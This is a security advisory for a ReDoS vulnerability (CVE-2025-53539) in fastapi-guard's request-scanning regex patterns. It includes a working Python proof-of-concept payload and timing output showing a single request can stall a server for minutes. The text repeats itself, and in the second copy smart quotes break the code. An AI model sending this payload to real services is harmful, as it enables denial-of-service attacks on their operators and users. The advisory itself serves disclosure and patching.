Headline
GHSA-j47q-rc62-w448: fastapi-guard is vulnerable to ReDoS through inefficient regex
Summary
fastapi-guard detects penetration attempts by using regex patterns to scan incoming requests. However, some of the regex patterns used in detection are extremely inefficient and can cause polynomial complexity backtracks when handling specially crafted inputs.
It is not as severe as exponential complexity ReDoS, but still downgrades performance and allows DoS exploits. An attacker can trigger high cpu usage and make a service unresponsive for hours by sending a single request in size of KBs.
PoC
e.g. https://github.com/rennf93/fastapi-guard/blob/1e6c2873bfc7866adcbe5fc4da72f2d79ea552e7/guard/handlers/suspatterns_handler.py#L31C79-L32C7
payload = lambda n: '<'*n+ ' '*n+ 'style=' + '"'*n + ' '*n+ 'url('*n # complexity: O(n^5)
print(requests.post("http://172.24.1.3:8000/", data=payload(50)).elapsed) # 0:00:03.771120
print(requests.post("http://172.24.1.3:8000/", data=payload(100)).elapsed) # 0:01:17.952637
print(requests.post("http://172.24.1.3:8000/", data=payload(200)).elapsed) # timeout (>15min)
Single-threaded uvicorn workers can not handle any other concurrent requests during the elapsed time.
Impact
Penetration detection is enabled by default. Services that use fastapi-guard middleware without explicitly setting enable_penetration_detection=False are vulnerable to DoS.
Summary
fastapi-guard detects penetration attempts by using regex patterns to scan incoming requests. However, some of the regex patterns used in detection are extremely inefficient and can cause polynomial complexity backtracks when handling specially crafted inputs.
It is not as severe as exponential complexity ReDoS, but still downgrades performance and allows DoS exploits. An attacker can trigger high cpu usage and make a service unresponsive for hours by sending a single request in size of KBs.
PoC
e.g. https://github.com/rennf93/fastapi-guard/blob/1e6c2873bfc7866adcbe5fc4da72f2d79ea552e7/guard/handlers/suspatterns_handler.py#L31C79-L32C7
payload = lambda n: '<’*n+ ' '*n+ ‘style=’ + '"’*n + ' '*n+ 'url('*n # complexity: O(n^5)
print(requests.post("http://172.24.1.3:8000/", data=payload(50)).elapsed) # 0:00:03.771120 print(requests.post("http://172.24.1.3:8000/", data=payload(100)).elapsed) # 0:01:17.952637 print(requests.post("http://172.24.1.3:8000/", data=payload(200)).elapsed) # timeout (>15min)
Single-threaded uvicorn workers can not handle any other concurrent requests during the elapsed time.
Impact
Penetration detection is enabled by default. Services that use fastapi-guard middleware without explicitly setting enable_penetration_detection=False are vulnerable to DoS.
References
- GHSA-j47q-rc62-w448
- https://nvd.nist.gov/vuln/detail/CVE-2025-53539
- rennf93/fastapi-guard@d9d50e8